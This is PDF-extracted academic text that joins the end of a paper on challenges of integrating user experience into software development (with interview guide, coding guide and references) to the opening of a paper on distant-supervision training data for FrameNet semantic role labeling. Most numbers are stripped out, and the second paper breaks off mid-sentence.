competencies are also less critical when addressing usability. power struggles can be resolved using objective evidence that shows why an alternative is better than another. this can for instance be achieved through measurements which is possible for other quality characteristics, including usability, at least in theory. however, as we saw, measuring ux is difficult and even impossible in earlier phases. in addition, ux metrics and measures are not agreed upon or standardized, yet for other quality characteristics, practitioners have access to standards, e.g., iso/iec - (international organisation for standardisation (iso), ). therefore, in the case of ux, it is difficult to decide among various alternatives in order to resolve the power struggles. furthermore, the importance of the pragmatic and hedonic aspects of ux varies in different projects. for instance, maximizing efficiency is not always relevant for the software being designed, and not every software is required to support different be-goals such as curiosity, motivation, interest or fun. similarly, different characteristics of ux have different importance in different projects. while the first impression (i.e., temporality) may be more important for an e-commerce software, an e-learning software may require more focus on motivation (i.e., situatedness). we however argue that practitioners need to have sufficient knowledge and awareness on the hedonic and pragmatic aspects, ux characteristics, and be-goals to be able to make an informed decision regarding their relevance and importance in various projects. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. our study contributes to the current body of knowledge through identifying the overlaps in challenges of ux and other quality characteristics, in particular usability. these overlaps underline the significance of these challenges and call for more research on how to overcome them in practice. by highlighting these overlaps, we can help identify research areas for improving the work of ux as well as software quality in general. we can also make it easier for practitioners to spot, better understand, as well as find mitigation strategies for ux challenges by learning from past experiences and developments in the area of software quality. in addition, our study contributes to the current body of knowledge through connecting the challenges to the ux characteristics and clarifying the implications of these characteristics in day-to-day work of practitioners, in particular in comparison to usability and other quality characteristics. based on our work, there are at least three future studies that could be particularly interesting. first, it would be relevant to conduct an in-depth study to investigate various approaches that the academics or practitioners propose or apply to address the identified challenges, most importantly in relation to the characteristics of ux, and different software development cultures. second, it would also be valuable to examine the differences between ux and other quality characteristics, and their associated practices in more depth through a deeper case study. we have reported on the similarities and differences between ux and other quality characteristics to the extent supported by our data. because of the explorative nature of this study our data does not support details about how the studied organizations handle various quality characteristics in their day-to-day work. third, we did not study how the type of software being developed (e.g., leisure vs work) may impact the identified challenges in the studied organizations. investigating the correlation between the types of software and practices and challenges is an interesting future research direction. investigating this correlation can help organizations better understand the cause and effect of the challenges and better plan for addressing them. conclusion designing and developing for ux is a multidimensional and multidisciplinary activity which has not yet gained an established position in the software industry. many development companies still fail to deliver good ux in their products and services, and practitioners in these companies face various challenges when dealing with ux throughout their projects. although ux is different from usability, many of the present frameworks and guidelines for ux integration do not clearly separate these two concepts. moreover, the perception of ux generally differs in academic and industrial contexts: whereas the former concentrates on the hedonic aspect and emotions, the latter focuses more on functionality and usability issues. our study shows that approaches for integrating ux into software development require further development. in particular, we showed that the characteristics of ux (hassenzahl, ), i.e., subjective, holistic, dynamic, context-dependent, and worthwhile play an important role in shaping ux challenges. we provided a deeper analysis of ux challenges through the lens of the aforementioned ux characteristics. these characteristics have at least implications for the day-to-day kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. work of practitioners. to the best of our knowledge, nine of these implications have not been previously reported, and are unique to our study. through these implications, we explained the extra difficulties practitioners face in their work with ux compared to usability and other quality characteristics. we could also explain the lopsided focus of industry on the pragmatic aspect of ux. the related work does not provide such an analysis nor does it often make such a differentiation between ux and usability except for the few studies we summarized the related work. we therefore bring depth to the identified challenges by presenting their relation to the ux characteristics. we hope to have helped the community to identify ways to systematically improve the current ux. to make future progress with integrating ux practices into software development processes, the community needs to take into account these ux characteristics and their implications for the day-to-day work of practitioners when developing guidelines, tools and methods to address related challenges. practitioners need to be aware of the ux characteristics not only in evaluations but also requirement and design activities. it is also of crucial importance to understand and address the impact of these characteristics on communication and collaboration between ux and non-ux practitioners. admittedly, the importance of the pragmatic and hedonic aspects of ux is different in projects. nevertheless, practitioners need to be aware of the differences between these aspects, and various ux characteristics to make an informed decision in each project regarding where to focus and why. the challenges and implications we present in this paper can guide future research on ux integration and creating more awareness concerning ux, and related challenges in the software industry. our findings can also shed light on the more general problem of how practitioners should integrate new and less mature knowledge areas, of which software quality characteristics and ux are examples, into software development processes. acknowledgements the authors would like to thank all the organizations and in particular practitioners who participated in this study. appendix a. interview guide general questions • what is your education and work background? • what is your role in this company? • how many years have you had this role? • do you know any of these terms (see appendix c)? if yes, how do you apply them in your work? • how do you define ux? • how do you define usability? kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. questions related to requirements • how is the overall requirements process in your company? • how do you approach functional requirements? • how do you approach non-functional/quality requirements? • how do you approach requirements related to ux? • what challenges do you face in your work regarding requirements related to ux? questions related to design • how is the overall design process in your company? • how is ‘design’ related to ‘requirements’ in your work? • what challenges do you face in your work regarding design, in particular in relation to ux? questions related to evaluation or testing • how is the overall evaluation/testing process in your company? • how do you test functional requirements? • how do you test non-functional requirements? • how do you test ux? • what challenges do you face in testing ux, or requirements related to ux? appendix b. coding guide • every segment can have any number of applicable codes • the codes should be selected from the list below. if a new concept appears in data the possibility of adding a new code should be discussed among the authors. • any uncertainty in coding a segment should be discussed among the authors. list of codes . challenges . solutions . ux . usability . ux vs usability . motives . definition . organization . project . software . process . individuals . tools and methods . roles . responsibilities . collaboration kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . communication . requirements . evaluations appendix c. terminology table the interviewees were asked to specify each and every term they know and whether they apply it in their work. they were also asked to add any relevant term that is missing from the list. • usability • user experience • quality in use (qiu) • emotional design • pleasurable design • aesthetics of design • affective computing • affective design • usability requirements • ux requirements • affective requirements • emotional requirements • user values • user emotions • user motivations • iso/iec • iso/iec • hedonic and pragmatic • instrumental and non-instrumental additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • pariya kashfi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • agneta nilsson and robert feldt conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the raw data includes the interviewee recordings and transcripts which because of nda between chalmers university and collaborative industries (i.e., companies who participated in the interviewees) are not allowed to be shared with any third party. more quotations are included and the coding process is elaborated to address this issue partially. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abrahão s, juristo n, law el-c, stage j. . interplay between usability and software development. journal of systems and software ( ): – doi . /j.jss. . . . alves r, valente p, nunes nj. . the state of user experience evaluation practice. in: proceedings of the th nordic conference on human–computer interaction: fun, fast, foundational (nordichi ’ ). new york: acm, – . ardito c, buono p, caivano d, costabile mf, lanzilotti r, dittrich y. . human- centered design in industry: lessons from the trenches. computer ( ): – doi . /mc. . . bak jo, nguyen k, risgaard p, stage j. . obstacles to usability evaluation in practice. in: th nordic conference on human–computer interaction building bridges— nordichi’ . new york: acm press, . balsamo s, di marco a, inverardi p, simeoni m. . model-based performance prediction in software development: a survey. ieee transactions on software engineering ( ): – doi . /tse. . . berntsson svensson r, gorschek t, regnell b, torkar r, shahrokni a, feldt r. . quality requirements in industrial practice—an extended interview study at eleven companies. ieee transactions on software engineering ( ): – doi . /tse. . . boivie i, gulliksen j, göransson b. . the lonesome cowboy: a study of the usability designer role in systems development. interacting with computers ( ): – doi . /j.intcom. . . . borg a, yong a, carlshamre p, sandahl k. . the bad conscience of requirements engineering: an investigation in real-world treatment of non-functional require- ments. in: proceedings of the rd conference on software engineering research and practice in sweden (serps’ ). – . braun v, clarke v. . using thematic analysis in psychology. qualitative research in psychology ( ): – doi . / qp oa. cajander Å, lárusdóttir mk, gulliksen j. . existing but not explicit—the user perspective in scrum projects in practice. in: proceedings of the th ifip tc kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . / qp oa http://dx.doi.org/ . /peerj-cs. international conference human–computer interaction (interact ). berlin, heidelberg: springer, – . chamberlain s, sharp h, maiden n. . towards a framework for integrating agile development and user-centred design. in: abrahamsson p, marchesi m, succi g, eds. th international conference, xp . lecture notes in computer science, oulu, finland, – . chung l, do prado leite jcs. . on non-functional requirements in software engineering. in: borgida at, chaudhri vk, giorgini p, yu e, eds. conceptual modeling: foundations and applications, ser. lecture notes in computer science. vol. . berlin heidelberg: springer, – . chung l, nixon ba, yu e, mylopoulos j. . non-functional requirements in software engineering. boston: kluwer academic publishing. desmet p, overbeeke k, tax s. . designing products with added emotional value: development and application of an approach for research through design. the design journal ( ): – doi . / . ferreira j, sharp h, robinson h. . agile development and user experience design integration as an ongoing achievement in practice. in: proceedings of the agile conference (agile ). piscataway: ieee, – . flick u. . an introduction to qualitative research. th edition. london: sage publica- tions. gerea c, herskovic v. . measuring user experience in latin america: an exploratory survey. in: proceedings of the latin american conference on human computer interaction—clihc’ . new york: acm press, – . gulliksen j, boivie i, persson j, hektor a, herulf l. . making a difference: a survey of the usability profession in sweden. in: proceedings of the rd nordic conference on human–computer interaction (nordichi’ ). new york: acm, – . hassenzahl m. . the thing and i: understanding the relationship between user and product. in: blythe ma, monk af, overbeeke k, wright pc, eds. funology: from usability to enjoyment. dordrecht: springer netherlands, – . hassenzahl m. . experience design: technology for all the right reasons. san francisco: morgan & claypool. hassenzahl m, burmester m, koller f. . attrakdiff: ein fragebogen zur messung wahrgenommener hedonischer und pragmatischer qualität (attraktif: a question- naire for the measurement of perceived hedonic and pragmatic quality). in: ziegler j, szwillus g, eds. mensch & computer : interaktion in bewegung. stuttgart: b.g. teubner, – . hassenzahl m, diefenbach s, göritz a. . needs, affect, and interactive products— facets of user experience. interacting with computers ( ): – doi . /j.intcom. . . . hassenzahl m, tractinsky n. . user experience—a research agenda. behaviour & information technology ( ): – doi . / . kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. international organisation for standardisation (iso). . iso : software engineering—product quality—part : quality in use metrics. geneva: international organisation for standardisation. international organisation for standardisation (iso). . iso : systems and software engineering—systems and software quality requirements and evaluation (square)—system and software quality models. geneva: international organisation for standardisation. isomursu m, sirotkin a, voltti p, halonen m. . user experience design goes agile in lean transformation—a case study. in: proceedings of the agile conference (agile ). piscataway: ieee, – . jordan pw. . designing pleasurable products: an introduction to the new human factors. boca raton: crc press. karlsson l, dahlstedt Å. g, regnell b, natt och dag j, persson a. . requirements engineering challenges in market-driven software development—an interview study with practitioners. information and software technology ( ): – doi . /j.infsof. . . . kashfi p, feldt r, nilsson a, svensson rb. . evidence-based timelines for user experience software process improvement retrospectives. in: nd euromicro conference on software engineering and advanced applications. piscataway: ieee. kujala s, roto v, väänänen-vainio-mattila k, sinnelä a. . identifying hedonic factors in long-term user experience. in: proceedings of the conference on designing pleasurable products and interfaces (dppi ’ ). new york: acm, : – : . kuusinen k, väänänen-vainio-mattila k. . how to make agile ux work more efficient: management and sales perspectives. in: proceedings of the th nordic conference on human–computer interaction: making sense through design (nordichi ’ ). new york: acm, – . lanzilotti r, costabile mf, ardito c, informatica d, aldo b. . addressing usability and ux in call for tender for it products. in: proceedings of the th ifip tc international conference human–computer interaction (interact ), – . law el-c, abrahão s. . interplay between user experience (ux) evaluation and sys- tem development. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . law el-c, van schaik p, roto v. . attitudes towards user experience (ux) measurement. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . locascio j, khurana r, he y, kaye j. . utilizing employees as usability participants: exploring when and when not to leverage your coworkers. in: proceedings of the chi conference on human factors in computing systems. new york: acm, – . nielsen j. . usability engineering. cambridge: academic press inc. nuseibeh b, easterbrook s. . requirements engineering: a roadmap. in: proceedings of the conference on the future of software engineering–icse’ . vol. . new york: acm press, – . kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /peerj-cs. oevad t, larsen lb. . how to reduce the ux bottleneck—train your soft- ware developers. behaviour & information technology ( ): – doi . / x. . . ovad t, larsen lb. . the prevalence of ux design in agile development processes in industry. in: proceedings of the agile conference (agile ). piscataway: ieee, – . paech b, kerlow d. . non-functional requirements engineering—quality is essential. in: proceedings of the th international working conference on requirements engineering: foundation for software quality (refsq’ ), – . rosenbaum s, rohn ja, humburg j. . a toolkit for strategic usability. in: proceed- ings of the sigchi conference on human factors in computing systems (chi’ ). new york: acm, – . runeson p, höst m. . guidelines for conducting and reporting case study re- search in software engineering. empirical software engineering ( ): – doi . /s - - - . väänänen-vainio-mattila k, roto v, hassenzahl m. . now let’s do it in practice: user experience evaluation methods in product development. in: proceedings of extended abstracts on human factors in computing systems (chi’ ). new york: acm, – . vermeeren apos, law el-c, roto v, obrist m, hoonhout j, väänänen-vainio-mattila k. . user experience evaluation methods: current state and development needs. in: proceedings of the th nordic conference on human–computer interaction extending boundaries (nordichi ’ ). new york: acm, – . wright p, mccarthy j. . experience-centered design: designers, users, and com- munities in dialogue, ser. in: synthesis lectures on human-centered informatics. san francisco: morgan & claypool. zimmermann pg. . beyond usability-measuring aspects of user experience. phd dissertation, swiss federal institute of technology zurich. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / x. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. generating training data for semantic role labeling based on label transfer from linked lexical resources silvana hartmann�, judith eckle-kohler�, iryna gurevych�‡ � ukp lab, technische universität darmstadt ‡ ukp lab, german institute for educational research http://www.ukp.tu-darmstadt.de abstract we present a new approach for generating role-labeled training data using linked lexi- cal resources, i.e., integrated lexical resources that combine several resources (e.g., word- net, framenet, wiktionary) by linking them on the sense or on the role level. unlike resource-based supervision in relation extrac- tion, we focus on complex linguistic anno- tations, more specifically framenet senses and roles. the automatically labeled train- ing data (www.ukp.tu-darmstadt.de/ knowledge-based-srl/) are evaluated on four corpora from different domains for the tasks of word sense disambiguation and seman- tic role classification. results show that classi- fiers trained on our generated data equal those resulting from a standard supervised setting. introduction in this work, we present a novel approach to automati- cally generate training data for semantic role labeling (srl). it follows the distant supervision paradigm and performs knowledge-based label transfer from rich external knowledge sources to large corpora. srl has been shown to improve many nlp appli- cations that rely on a deeper understanding of seman- tics, such as question answering, machine translation or recent work on classifying stance and reason in online debates (hasan and ng, ) and reading comprehension (berant et al., ). even though unsupervised approaches continue to gain popularity, srl is typically still solved using supervised training on labeled data. creating such labeled data requires manual annotations by experts, even though crowdsourcing has been used, it is still prob- resulting in corpora of highly limited size. this is especially true for the task of framenet srl where the amount of annotated data available is small. framenet srl annotates fine-grained semantic roles in accordance with the theory of frame seman- tics (fillmore, ) as illustrated by the following example showing an instance of the feeling frame including two semantic roles: heexperiencer feltfeeling no sense of guiltemotion in the betrayal of personal confidence. our novel approach to training data generation for framenet srl uses the paradigm of distant supervi- sion (mintz et al., ) which has become popular in relation extraction. in distant supervision, the over- all goal is to align text and a knowledge base, using some notion of similarity. such an alignment allows us to transfer information from the knowledge base to the text, and this information can serve as labeling for supervised learning. hence, unlike semi-supervised methods which typically employ a supervised clas- sifier and a small number of seed instances to do bootstrap learning (yarowsky, ), distant supervi- sion creates training data in a single run. a particular type of knowledge base relevant for distant supervi- sion are linked lexical resources (llrs): integrated lexical resources that combine several resources (e.g., wordnet, framenet, wiktionary) by linking them on the sense or on the role level. previous approaches to generating training data for srl (fürstenau and lapata, ) do not use lex- ical resources apart from framenet. for the task of lematic for srl labeling: the task is very complex, which results in manually adapted definitions (fossati et al., ), or con- strained role sets (feizabadi and padó, ). transactions of the association for computational linguistics, vol. , pp. – , . action editor: yuji matsumoto. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. www.ukp.tu-darmstadt.de/knowledge-based-srl/ www.ukp.tu-darmstadt.de/knowledge-based-srl/ word sense disambiguation (wsd), recent work on automatic training data generation based on llr has only used wordnet (cholakov et al., ), not con- sidering other sense inventories such as framenet. our distant supervision approach for automatic training data generation employs two types of knowl- edge sources: llrs and linguistic knowledge formal- ized as rules to create data labeled with framenet senses and roles. it relies on large corpora, because we attach labels to corpus instances only sparsely. we generate training data for two commonly dis- tinguished subtasks of srl: first, for disambiguation of the frame-evoking lexical element relative to the framenet sense inventory, a wsd task; and second, for argument identification and labeling of the seman- tic roles, which depends on the disambiguation result. regarding the subtask of framenet wsd, we derive abstract lexico-syntactic patterns from lexical infor- mation linked to framenet senses in an llr and recover them in large-scale corpora to create a sense (frame) labeled corpus. we address the subsequent steps of argument identification and role labeling by making use of linguistic rules and role-level links in an llr, creating a large role-labeled corpus with more than , roles. we extrinsically evaluate the quality of the auto- matically labeled corpora for frame disambiguation and role classification for verbs, using four framenet- labeled test-sets from different domains, and show that the generated training data is complementary to the framenet fulltext corpus: augmenting it with the automatically labeled data improves on using the framenet training corpus alone. we also evaluate our approach on german data to show that it gener- alizes across languages. we discuss in detail how our method relates to and complements recent devel- opments in framenet srl. the need for additional training data has also been reported for state-of-the- art systems (fitzgerald et al., ). our work has three main contributions: (i) for automatic sense labeling, we significantly extend cholakov et al. ( )’s distant supervision approach by using discriminating patterns and a different sense inventory, i.e., framenet. we show that discriminat- ing patterns can improve the quality of the automatic sense labels. (ii) we use a distant supervision ap- proach – building on llrs – to address the complex problem of training data generation for framenet role labeling, which builds upon the sense labeling in (i). (iii) our detailed evaluation and analysis show that our approach for data generation is able to gen- eralize across domains and languages. the rest of this paper is structured as follows: after introducing our approach to training data generation in section , we describe the automatic sense labeling (section ) and role classification (section ) in detail. in section we apply our approach to german data. we present related work in section and discuss our approach in relation to state-of-the-art framenet srl in section , followed by discussion and outlook in section . section concludes. knowledge-based label transfer figure : automatic training data generation – overview. our distant supervision method for generating training data for srl consists of two stages, first gen- erating sense-labeled data, then extending these to role-labeled data, as shown in fig. . both stages use large-scale corpora and llrs as knowledge sources. knowledge sources. for the first stage, pre- sented in detail in section , we use sense-level in- formation from the llr uby (llr in fig. ) and exploit the sense links between the uby versions of framenet, wordnet, wiktionary and verbnet. more specifically, we employ (i) sense examples from framenet, wordnet, and wiktionary, and (ii) verbnet information, i.e., syntactic subcategorization frames, as well as semantic roles and selectional pref- erence information of the arguments. it is important to note that the sense examples in framenet (called lexical unit examples) are a different resource than the framenet fulltext corpus. for the second stage, presented in section , we use the llr semlink (llr in fig. ) and exploit the role-level links between verbnet semantic roles and framenet roles. semlink (bonial et al., ) con- tains manually curated mappings of the fine-grained framenet roles to roles in the verbnet role inven- tory, including more than role-level links. formalization. more formally, we can cast our distant supervision method for automatic training data generation as a knowledge-based label transfer approach. given a set x of seed instances derived from knowledge sources and a label space y , a set of labeled seed instances consists of pairs {xi, yi}, where xi ∈ x, and yi ∈ y ; i = , . . . , n. for an unlabeled instance uj ∈ u, j = , . . . , m, where u is a large corpus and u ∩ x = Ø, we employ label transfer from {xi, yi} to uj based on a common representation rxi and ruj using a matching criterion c. the label yi is transferred to uj if c is met. for the creation of sense labeled data, we perform pattern-based labeling, where y is the set of sense labels, rxi and ruj are sense patterns generated from corpus instances and from llrs including sense- level links, and c considers the similarity of the pat- terns based on a similarity metric. we create role-labeled data with rule-based label- ing where y is the set of role labels, rxi and ruj are attribute representations of roles using syntactic and semantic attributes. attribute representations are derived from parsed corpus instances and from linguistic knowledge, also including role-level links from llrs; here, c is fulfilled if the attribute repre- sentations match. experimental setup. in our distant supervision approach to training data generation, we (i) create our training data in a single run (and not iteratively) (ii) perform sparse labeling in order to create training data, i.e., we need a very large corpus (e.g., unlabeled web data) in order to obtain a sufficient number of training instances. we analyze the resulting labeled corpora and evaluate them extrinsically using a clas- sifier trained on the automatically labeled data on separate test datasets from different domains. this way, we can also show that a particular strength of our approach is to generalize across domains. in the next section we present the automatic cre- ation of sense-labeled corpora (stage ). automatic labeling for word sense in this work, we are the first to apply distant super- vision-based verb sense labeling to the framenet verb sense inventory. we extend the methodology by cholakov et al. ( ) who also exploit sense-level information from the llr uby for the automatic sense-labeling of corpora with verb senses, but use wordnet as a sense inventory. we use the same types of information and similarity metric (which we call sim in this paper), but our label space y is given by the framenet verb sense inventory (|y |= , ), and therefore we exploit , sense links from framenet to wordnet, verbnet and wiktionary. the similarity metric sim ∈ [ .. ] is based on dice’s coefficient and considers the common n- grams, n = , . . . , : ( ) sim(rxi, ruj ) = ∑ n= |gn(p )∩gn(p )|·n normw where w >= is the size of the window around the target verb, gn(pi), i ∈ { , } is the set of n-grams occurring in rxi and ruj , and normw is the normal- ization factor defined by the sum of the maximum number of common n-grams in the window w. step a: seed pattern extraction and filtering. we call the sense patterns rxi generated from seed in- stances xi in the llr uby seed patterns and follow cholakov et al. ( ) for the generation of those seed patterns, i.e., we create lemma sense patterns (lsps), consisting of the target verb lemma and lem- matized context only, and second, abstract sense pat- terns (asps), consisting of the target verb lemma and a number of rule-based generalizations of the context words. an example of each of the sense patterns for the framenet sense feeling of the verb feel in the sense example he felt no sense of guilt in the betrayal of personal confidence is: . lsp: he feel no sense of guilt in . asp: pp feel cognition of feeling in act asps generalize to a large number of contexts which is particularly important for identifying productively used verb senses, while lsps serve to identify fixed constructions such as multiword expressions. using n-grams instead of unigrams takes word order into account, which is particularly important for verb senses, as syn- tactic and semantic properties often correlate. a drawback of cholakov et al. ( )’s method for seed pattern extraction is that it extracts a certain number of very similar (or even identical) seed pat- terns for different senses. those seed patterns may lead to noise in the sense-labeled data. to prevent this problem, we developed an optional discriminating filter that removes problematic seed patterns. the intuition behind the discriminating filter is the following: some of the asp and lsp patterns which we extract from the seed instances discriminate better between senses than others; i.e., if the same or a very similar pattern is extracted for sense wi and sense wj of a word w, i, j ∈ ( , . . . , n), n=number of senses of w, i = j, this pattern does not discriminate well, and should not be used when labeling new senses. we filter the asp and lsp patterns by comparing each pattern for sense wi to the patterns of all the other senses wj, i = j using the similarity metric sim; if we find two patterns wi, wj whose similarity score exceeds a filtering threshold f, we greedily discard them both. the filtering may increase precision at the cost of recall, because it reduces the number of seed pat- terns. since we use the approach on large corpora, we still expect sufficient recall. our results show that discriminating filtering improves the quality of the automatically labeled corpus. essentially, our discriminating filter integrates the goal of capturing sense distinctions into our approach. the same goal is pursued by corpus analysis patterns (cpa pat- terns, hanks ( )), which have been created to capture sense distinctions in word usage by combin- ing argument structures, collocations and an ontology of semantic types for arguments. in contrast to our fully automatic approach, developing cpa patterns based on corpus evidence was a lexicographic effort. the following example compares two asp patterns to a cpa pattern from popescu et al. ( ): . cpa: [[human]] | [[institution]] abandon [[ac- tivity]] | [[plan]] . asp: jj person abandon jj cognition of jj quantity . asp: person abandon communication which vvd pp jj in our abstract asp patterns look similar, as they also abstract argument fillers to semantic classes and pre- serve certain function words. step b: sense label transfer. using the ap- proach of cholakov et al. ( ), we create sense patterns ruj from all sentences uj of an unlabeled corpus that contain a target verb, for instance the sen- tence u : i feel strangely sad and low-spirited today for the verb feel. for every uj, its sense pattern ruj is then compared to the labeled seed patterns using the similarity metric sim. from the most similar seed patterns {rxi, yi} that have a similarity score above a threshold t, the set of candidate labels {yi} is ex- tracted. the approach picks a random sense label from {yi} and attaches it to uj. if an asp and an lsp receive the same similar- ity score, lsps get precedence over asps, i.e., the labeled sense is selected from the senses associated with the lsp. using this method, our example sen- tence u receives the label feeling. this approach leads to a sparse labeling of the un- labeled corpus, i.e., many unlabeled sentences are discarded because their similarity to the seed pattern is too low. it however scales well to large corpora be- cause it requires only shallow pre-processing, as we will show in the next section: we apply our approach to a large web corpus and analyze the resulting sense- labeled corpora. . creating the sense-labeled corpus unlabeled corpora. we used parts to of the ukwac corpus (baroni et al., ) as input for the automatic sense label transfer for the verb lemmas in our test sets (see section . , test data). seed patterns. the seed patterns for step a of the sense labeling were extracted from a) the framenet example sentences, and b) sense examples from resources linked to framenet in uby, namely wordnet, wiktionary, and verbnet. without a dis- criminating filter, this results in more than , lsp and , asp, % and % of the total number, respectively. adding a strict discriminating filter f= . reduces the patterns to , lsp and , asp. proportionally more asp are filtered, leading to % lsp and % asp. the number of senses with patterns decreases from , to , . threshold setting. in order to determine the pa- rameter values for the label transfer, i.e., which values unless t is very high, there is usually more than one candi- date sense label. f t p r f - . . . . - . . . . - . . . . - . . . . . . . . . . . . . . . . . . . . . . . . table : combinations of f and t evaluated on fnft-dev; configurations for best f , r and p in bold. for threshold t, and filter f result in a high-quality training corpus, we perform an extrinsic evaluation on a development set: we use a set of automatically labeled corpora based on ukwac section generated with different threshold values to train a verb sense disambiguation (vsd) system. we evaluate preci- sion p (the number of correct instances/number of labeled instances), recall r (the number of labeled instances/all instances), and f (harmonic mean of p and r) of the systems on the development-split fnft- dev of the framenet . fulltext corpus (fnft), used by das and smith ( ). a detailed description of the vsd system follows in the next section. we varied the thresholds of the discriminating fil- ter f (step a) and the threshold t (step b) on the values ( . , . , . , . ), as was suggested by cholakov et al. ( ) for t. we also compare cor- pora with and without the discriminating filter f. to save space, we only report results with f for t = . in table . as expected, increasing the pattern similarity threshold t at which a corpus sentence is labeled with a sense increases the precision at the cost of recall. similarly, employing a discriminating filter f at t= . increases precision compared to using no filter, and leads to the best precision on the validation set. note that the discriminating filter gets stricter, i.e. discriminates more, with a lower f value. ac- cordingly, low f values lead to the highest precision of . for the strict thresholds t= . and f= . , indicating that precision-oriented applications can benefit from higher discrimination. automatically labeled corpora. the setting with the highest f in table leads to the very large sense- labeled corpus was xl. we also use f and t values with the highest precision in order to evaluate the ben- efits of the discriminating filter, leading to was l. instances senses verbs s/v i/s was xl (t= . ) . * , . , was x (t= . ) , , . was l (t= . ,f= . ) , , . fnft? , . table : sense statistics of automatically labeled corpora. the size of these corpora ranges from , to . million sense instances with an average of . to . senses per verb, compared to , verb sense instances in fnft?, fnft filtered by the verbs in our four test sets, see table . we compare was l to was x, the corpus labeled with t = . , but without filter f in order to eval- uate the impact of adding the discriminating filter. compared to the latter corpus, was l contains % fewer sense instances, but only % fewer distinct senses, and % of the senses which are also covered by was xl. the number of instances per sense is zipf-distributed with values ranging from to over , , leading to the average of , reported in table for was xl. . vsd experiments to compare the quality of our automatically sense- labeled corpora to manually labeled corpora, we per- form extrinsic evaluation in a vsd task. vsd sys- tem. we use a standard supervised setup for sense disambiguation: we extract lexical, syntactic, and se- mantic features from the various training sets and the test sets. for pre-processing, we use dkpro core (eckart de castilho and gurevych, ), e.g., stanford tokenizer, treetagger for pos tagging and lemmatization, stanfordnamedentityrecognizer for ner and stanford parser for dependency parsing. we train a logistic regression classifier in the weka implementation (hall et al., ) using the same features as cholakov et al. ( ). training corpora. we trained our vsd system on was xl and was l, and, for comparison, on the training split fnft-train of fnft . used by das and smith ( ). test data. for evaluation, we used four different framenet-labeled datasets. the statistics of the test datasets are compiled in table , a brief description of verbs senses s/v inst(s) inst(r) fate . , , masc . , , semeval . , fnft-test . , , fnft-dev . , , table : test dataset statistics on verbs; inst(s/r): number of ambiguous sense and role instances in the datasets. each dataset follows. we use the frame and role anno- tations in the semeval task evaluation and trial dataset (ruppenhofer et al., ). it consists of literature texts. the fate corpus contains frame annotations on the rte- textual entailment chal- lenge test set (burchardt and pennacchiotti, ). it is based on newspaper texts, texts from informa- tion extraction datasets such as ace, muc- , and texts from question answering datasets such as clef and trec. these two datasets were created prior to the release of framenet . . for those sets, only senses (verb-frame combinations) that still occur in framenet . and their roles were included in the evaluation. the masc wordsense sentence cor- pus (passonneau et al., ) is a balanced corpus that contains sense annotations for instances of words from the masc corpus. it contains word- net sense labels, we use a slightly smaller subset of verbs annotated with framenet . labels. we also evaluate on the test-split fnft-test of the framenet fulltext corpus used in das and smith ( ). . vsd results and analysis. impact of pattern filters. a comparison of results between the was corpora (first block of table ) shows that the filters in was l improve precision for three out of four test sets, which shows that stronger filtering can benefit precision-oriented applications. precision on the masc corpus is lower when us- ing a discriminating filter. due to the larger polysemy in masc – on average . senses per verb (see s/v in table ), it contains rare senses. the reduction of sense instances caused by the discriminating filter leads to some loss of instances for those senses and a lower precision on masc. analysing the results in detail for the example verb tell shows that was xl contains all senses this subset is currently not part of the masc download, but according to personal communication with the developers will be published soon. of tell in masc; was l contains of them. how- ever, the number of training instances per sense for was l can be lower by factor or more compared to was xl (e.g., tens to hundreds, hundreds to thou- sands), leading to only few instances per sense. the sparsity problem could either be solved by using a less strict filter, or by labeling additional instances from ukwac, in order to preserve more instances of the rare senses for stricter thresholds t and f. these results also show that the noise that is added to the corpora in a low-discrimination, high-recall setting will be to a certain extent drowned out by the large number of sense instances. for was xl, recall is significantly higher for all test sets, leading to a higher f . all significance scores reported in this paper are based on fisher’s exact test at significance level p< . . comparison to fnft-train. we also compare the results of our was-corpora to a vsd system trained on the reference corpus fnft-train (see table ). on semeval, precision does not deviate signifi- cantly from the fnft-train system. on fnft-test, it is significantly lower. for was xl, precision is significantly lower on fate, but significantly higher on masc. for was l the precision is similar on masc and fate. for was xl, the recall is signif- icantly higher than for fnft-train on all test sets, leading to a higher f . this is the result of the larger sense coverage of the framenet lexicon, which pro- vided the seeds for the automatic labeling. training our system directly on the framenet lexi- cal unit examples is, however, not a viable alternative: it leads to a system with similar precision our was- corpora, but very low recall (between . and . ). by using the sense examples in our seed patterns, we retain their benefits on sense coverage, and improve the system recall and f at the same time. comparative analysis. in a detailed analysis of our results, we compare the performance of the was xl and fnft-train based systems on those verbs of 